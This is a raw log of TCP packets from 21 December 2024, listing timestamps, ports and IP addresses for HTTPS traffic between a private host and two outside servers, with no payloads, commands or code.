Dec 21, 2024 21:04:40.453471899 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.453471899 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.453483105 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.453495026 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.453726053 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.453726053 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.454602003 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.454807043 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.454999924 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.455199003 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.455420017 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.455446959 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.455674887 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.455765963 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.456712961 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.456938982 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.457016945 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.457434893 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.457509041 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.457782984 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.457782984 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.457798004 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.458184004 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.458300114 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.458515882 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.458614111 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.459100008 CET	49686	80	192.168.11.20	23.192.36.227
Dec 21, 2024 21:04:40.578125954 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.578377008 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.578378916 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.578444004 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.578457117 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.578567982 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.578761101 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.579508066 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.579762936 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.580154896 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.580383062 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.580776930 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.581007957 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.581187963 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.581268072 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.581794024 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.582256079 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.582484007 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.582745075 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.583008051 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.583010912 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.583034039 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.583206892 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.583353996 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.583370924 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.583385944 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.583630085 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.584573984 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.584784985 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.584975004 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.585088015 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.585367918 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.585367918 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.585400105 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.585613966 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.586699009 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.586925030 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.586952925 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.587301016 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.587438107 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.587673903 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.588361979 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.588633060 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.589482069 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.589741945 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.589896917 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.590121984 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.590128899 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.590204000 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.590219975 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.590406895 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.590653896 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.590914965 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.590965986 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.590979099 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.591136932 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.591136932 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.592535973 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.592540979 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.592747927 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.592762947 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.592926979 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.592936993 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.593111992 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.593111992 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.595261097 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.595278978 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.595638990 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.595638990 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.595638990 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.595657110 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.595854044 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.597392082 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.597409010 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.597666979 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.597681046 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.597852945 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.598057032 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.600143909 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.600162029 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.600364923 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.600378990 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.600548029 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.602273941 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.602298021 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.602490902 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.602571011 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.602582932 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.602936029 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.605045080 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.605086088 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.605282068 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.605295897 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.605493069 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.605674982 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.607209921 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.607233047 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.607363939 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.607604980 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.607618093 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.607857943 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.609827042 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.609858036 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.610047102 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.610060930 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.610207081 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.610394955 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.709862947 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.709887981 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.710048914 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.710208893 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.710225105 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.710395098 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.710395098 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.711730003 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.711762905 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.711932898 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.711932898 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.711957932 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.712219000 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.712243080 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.713340044 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.713363886 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.713681936 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.713895082 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.713912010 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.714165926 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.715584993 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.715595961 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.715733051 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.715986967 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.715996027 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.716181040 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.716387987 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.718348980 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.718363047 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.718755007 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.718755007 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.718767881 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.718943119 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.722012043 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.722024918 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.722203970 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.722285986 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.722291946 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.722455978 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.722474098 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.722474098 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.722490072 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.722498894 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.722883940 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.722883940 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.725265980 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.725276947 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.725632906 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.725632906 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.725646019 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.725986004 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.727787971 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.727799892 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.728091955 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.728102922 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.728286028 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.728286028 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.728465080 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.730027914 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.730038881 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.730184078 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.730366945 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.730377913 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.730590105 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.730590105 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.734399080 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.734411955 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.734611034 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.734611034 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.734625101 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.734878063 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.734878063 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.743891954 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.743905067 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.744193077 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.744375944 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.744375944 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.744385004 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.744635105 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.744966984 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.744978905 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.745115995 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.745254040 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.745260954 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.745491028 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.746005058 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.746016979 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.746208906 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.746388912 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.746388912 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.746396065 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.746577024 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.747309923 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.747323036 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.747493982 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.747765064 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.747772932 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.748145103 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.748243093 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.748255014 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.748437881 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.748617887 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.748617887 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.748625040 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.748858929 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.749473095 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.749485016 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.749942064 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.749942064 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.749955893 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.750101089 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.750293016 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.750444889 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.750458002 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.750606060 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.750782013 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.750787973 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.750793934 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.750838995 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:40.751071930 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.751245975 CET	49754	443	192.168.11.20	172.67.223.7
Dec 21, 2024 21:04:40.751255035 CET	443	49754	172.67.223.7	192.168.11.20
Dec 21, 2024 21:04:47.046036005 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:47.046058893 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:47.046277046 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:47.050795078 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:47.050807953 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:47.322879076 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:47.323084116 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:47.325140953 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:47.325156927 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:47.325509071 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:47.336009026 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:47.378261089 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:47.946240902 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:47.946270943 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:47.946590900 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:47.946602106 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:47.948621035 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:47.948700905 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:47.948793888 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:47.948993921 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:47.949013948 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:47.949084044 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:47.949084044 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:47.949095964 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:47.949476957 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.076562881 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.077265978 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.077294111 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.077486992 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.077507973 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.077871084 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.084645987 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.090379953 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.090560913 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.090595961 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.090615034 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.090977907 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.099176884 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.107611895 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.107841969 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.107860088 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.116358995 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.116517067 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.116714954 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.116734028 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.116921902 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.124914885 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.137526989 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.137706041 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.137912989 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.137933016 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.138484955 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.142251968 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.191728115 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.191746950 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.194458961 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.194715023 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.194734097 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.203229904 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.203255892 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.203428984 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.203447104 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.203779936 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.213085890 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.217571974 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.217981100 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.217998981 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.232841969 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.232892036 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.233031034 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.233047962 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.233196020 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.233386993 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.247287035 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.247641087 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.247658014 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.248028994 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.257482052 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.257719994 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.263176918 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.263437033 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.270021915 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.270761013 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.277460098 CET	443	49755	104.21.37.173	192.168.11.20
